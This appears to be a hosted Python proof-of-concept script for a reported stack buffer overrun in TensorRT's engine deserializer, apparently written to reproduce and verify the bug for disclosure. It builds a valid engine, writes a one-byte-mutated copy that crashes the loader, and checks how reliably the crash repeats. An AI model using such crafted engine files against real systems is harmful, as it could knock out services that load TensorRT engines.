File size: 6,990 Bytes
f145112
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
"""
VULN-009: Stack Buffer Overrun in TensorRT Engine Deserializer
================================================================
A single-byte mutation in the NGNE (engine graph) section of a valid
TensorRT engine file triggers STATUS_STACK_BUFFER_OVERRUN (0xC0000409)
during deserializeCudaEngine().

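This exit code is consistent with a stack-based buffer overflow detected by
Windows /GS stack cookie protection. Note that 0xC0000409 is also raised by
any __fastfail() call (for example abort() in recent MSVC runtimes), so the
root cause should be confirmed under a debugger. The crash occurs in the
closed-source libnvinfer.dll engine parser.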

CWE: CWE-121 (Stack-based Buffer Overflow)
Distinct from VULN-006 (CWE-125, Out-of-bounds Read / ACCESS_VIOLATION)
Distinct from VULN-008 (CWE-369, Integer Divide-by-Zero)

To reproduce:
1. python vuln009_standalone_poc.py build   (builds valid + crash engines)
2. python vuln009_standalone_poc.py crash   (loads crash engine, triggers crash)
3. python vuln009_standalone_poc.py verify  (full verification)
"""
import os, sys, struct, subprocess, time
import numpy as np

# Engine files are written next to this script.
POC_DIR = os.path.dirname(os.path.abspath(__file__))
VALID_PATH, CRASH_PATH = (
    os.path.join(POC_DIR, engine_name)
    for engine_name in ("vuln009_valid.engine", "vuln009_crash.engine")
)

# Single-byte mutation applied to the valid engine (offset/value from full scan).
CRASH_OFFSET, CRASH_VALUE, ORIGINAL_VALUE = 498, 0xFF, 0x00


def cmd_build():
    """Build a valid BatchNorm engine, then write a one-byte-mutated copy.

    Steps:
      1. Build a single-node BatchNormalization ONNX model and compile it
         with TensorRT.
      2. Write the serialized engine to VALID_PATH and check that it
         deserializes.
      3. Overwrite the byte at CRASH_OFFSET with CRASH_VALUE and write the
         result to CRASH_PATH.

    Prints an error and exits with status 1 if parsing, building or loading
    fails, or if the engine is too short to contain CRASH_OFFSET.
    """
    import tensorrt as trt
    from onnx import helper, TensorProto, numpy_helper

    print("[*] Building valid BatchNorm TensorRT engine...")
    # BatchNorm parameters for 8 channels: scale=1, bias=0, mean=0, var=1.
    bn_s = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_s")
    bn_b = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_b")
    bn_m = numpy_helper.from_array(np.zeros(8, dtype=np.float32), name="bn_m")
    bn_v = numpy_helper.from_array(np.ones(8, dtype=np.float32), name="bn_v")
    g = helper.make_graph(
        [helper.make_node("BatchNormalization", ["x", "bn_s", "bn_b", "bn_m", "bn_v"], ["output"])],
        "batchnorm",
        [helper.make_tensor_value_info("x", TensorProto.FLOAT, [1, 8, 4, 4])],
        [helper.make_tensor_value_info("output", TensorProto.FLOAT, None)],
        [bn_s, bn_b, bn_m, bn_v])
    model = helper.make_model(g, opset_imports=[helper.make_opsetid("", 17)])
    model.ir_version = 8

    logger = trt.Logger(trt.Logger.WARNING)
    builder = trt.Builder(logger)
    network = builder.create_network(1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH))
    parser = trt.OnnxParser(network, logger)
    # Explicit checks rather than `assert`: with `python -O` asserts are
    # stripped, which would silently skip the parse() call itself.
    if not parser.parse(model.SerializeToString()):
        for idx in range(parser.num_errors):
            print(f"    {parser.get_error(idx)}")
        print("[-] Parse failed")
        sys.exit(1)
    config = builder.create_builder_config()
    config.set_memory_pool_limit(trt.MemoryPoolType.WORKSPACE, 256 << 20)
    engine_bytes = builder.build_serialized_network(network, config)
    if not engine_bytes:
        print("[-] Build failed")
        sys.exit(1)
    engine_data = bytes(engine_bytes)

    # Save valid engine
    with open(VALID_PATH, "wb") as f:
        f.write(engine_data)
    print(f"[+] Valid engine: {VALID_PATH} ({len(engine_data)} bytes)")

    # Verify it loads
    runtime = trt.Runtime(logger)
    engine = runtime.deserialize_cuda_engine(engine_data)
    if not engine:
        print("[-] Valid engine failed to load")
        sys.exit(1)
    print("[+] Valid engine loads OK")

    # The offset was found against one specific engine layout; make sure it
    # is at least inside this build's engine before indexing.
    if CRASH_OFFSET >= len(engine_data):
        print(f"[-] Engine is only {len(engine_data)} bytes; "
              f"offset {CRASH_OFFSET} is out of range")
        sys.exit(1)
    original_byte = engine_data[CRASH_OFFSET]
    if original_byte != ORIGINAL_VALUE:
        print(f"[!] Warning: byte at offset {CRASH_OFFSET} is 0x{original_byte:02x}, "
              f"expected 0x{ORIGINAL_VALUE:02x}; the engine layout may differ "
              f"from the one that was scanned")

    # Create crash variant
    mutated = bytearray(engine_data)
    print(f"[*] Mutating byte at offset {CRASH_OFFSET}: 0x{original_byte:02x} -> 0x{CRASH_VALUE:02x}")
    mutated[CRASH_OFFSET] = CRASH_VALUE

    with open(CRASH_PATH, "wb") as f:
        f.write(mutated)
    print(f"[+] Crash engine: {CRASH_PATH} ({len(mutated)} bytes)")
    print(f"[+] Build complete. Run 'python {os.path.basename(__file__)} crash' to trigger.")


def cmd_crash():
    """Deserialize the mutated engine inside the current process.

    Exits with status 1 if the crash engine has not been built yet. The
    deserialize call is expected to kill the interpreter with
    STATUS_STACK_BUFFER_OVERRUN; the final message is only printed if the
    call returns.
    """
    import tensorrt as trt

    crash_engine_missing = not os.path.exists(CRASH_PATH)
    if crash_engine_missing:
        print("[-] Crash engine not found. Run 'build' first.")
        sys.exit(1)

    for banner in (
        f"[*] Loading crash engine: {CRASH_PATH}",
        "[*] Expecting STATUS_STACK_BUFFER_OVERRUN (0xC0000409)...",
    ):
        print(banner)

    trt_logger = trt.Logger(trt.Logger.ERROR)
    trt_runtime = trt.Runtime(trt_logger)
    with open(CRASH_PATH, "rb") as engine_file:
        payload = engine_file.read()

    # Expected crash site: control normally never gets past this call.
    loaded = trt_runtime.deserialize_cuda_engine(payload)
    outcome = (
        "[!] Engine loaded (unexpected - crash should have occurred)"
        if loaded
        else "[*] Engine rejected (no crash, but deserialization failed)"
    )
    print(outcome)


def cmd_verify():
    """Verify the crash out-of-process and report its type and repeatability.

    Loads the valid and the mutated engine in child interpreters, classifies
    the mutated engine's exit code, prints the byte-level difference between
    the two files, and re-runs the mutated engine ten times.

    Exits with status 1 if either engine file is missing or the valid engine
    does not load cleanly.
    """
    # Exit codes as reported by subprocess on Windows (unsigned NTSTATUS).
    stack_buffer_overrun = 0xC0000409  # 3221226505
    access_violation = 0xC0000005      # 3221225477
    repro_runs = 10

    if not os.path.exists(VALID_PATH) or not os.path.exists(CRASH_PATH):
        print("[-] Engine files not found. Run 'build' first.")
        sys.exit(1)

    print("[1] Testing valid engine...")
    rc1 = _test_engine_subprocess(VALID_PATH)
    print(f"    Return code: {rc1}")
    # Explicit check instead of `assert`, which is stripped under `python -O`.
    if rc1 != 0:
        print("[-] Valid engine should load OK")
        sys.exit(1)

    print("[2] Testing crash engine...")
    rc2 = _test_engine_subprocess(CRASH_PATH)
    print(f"    Return code: {rc2}")

    if rc2 == stack_buffer_overrun:
        print("[+] CONFIRMED: STATUS_STACK_BUFFER_OVERRUN (0xC0000409)")
        print("[+] CWE-121: Stack-based Buffer Overflow")
        print("[+] This is a DISTINCT vulnerability from VULN-006 (ACCESS_VIOLATION)")
    elif rc2 == access_violation:
        print("[!] ACCESS_VIOLATION (0xC0000005) - different crash type")
    else:
        print(f"[?] Unexpected return code: {rc2}")

    # Show diff (files are closed deterministically via `with`)
    with open(VALID_PATH, "rb") as f:
        valid = f.read()
    with open(CRASH_PATH, "rb") as f:
        crash = f.read()
    diffs = [(off, v, c) for off, (v, c) in enumerate(zip(valid, crash)) if v != c]
    print("\n[3] Difference between valid and crash engines:")
    for off, v, c in diffs:
        print(f"    Offset {off}: 0x{v:02x} -> 0x{c:02x}")
    if len(valid) != len(crash):
        # zip() stops at the shorter file, so report the tail that was not compared.
        print(f"    Size differs: {len(valid)} vs {len(crash)} bytes")

    # Reproducibility test
    print(f"\n[4] Reproducibility test ({repro_runs} runs)...")
    results = [_test_engine_subprocess(CRASH_PATH) for _ in range(repro_runs)]
    crash_count = results.count(stack_buffer_overrun)
    print(f"    Stack overrun: {crash_count}/{repro_runs} runs")
    print(f"    Return codes: {results}")


def _test_engine_subprocess(engine_path):
    """Test engine loading in subprocess. Returns exit code."""
    code = f"""
import tensorrt as trt
logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
with open(r"{engine_path}", "rb") as f:
    engine = runtime.deserialize_cuda_engine(f.read())
print("OK" if engine else "FAIL")
"""
    try:
        r = subprocess.run([sys.executable, "-c", code],
                          capture_output=True, text=True, timeout=15)
        return r.returncode
    except subprocess.TimeoutExpired:
        return -999


if __name__ == "__main__":
    # Command-line entry point: dispatch the first argument to its handler.
    if len(sys.argv) < 2:
        print(f"Usage: python {os.path.basename(__file__)} [build|crash|verify]")
        sys.exit(1)

    handlers = {
        "build": cmd_build,
        "crash": cmd_crash,
        "verify": cmd_verify,
    }
    requested = sys.argv[1]
    handler = handlers.get(requested)
    if handler is None:
        print(f"Unknown command: {requested}")
        sys.exit(1)
    handler()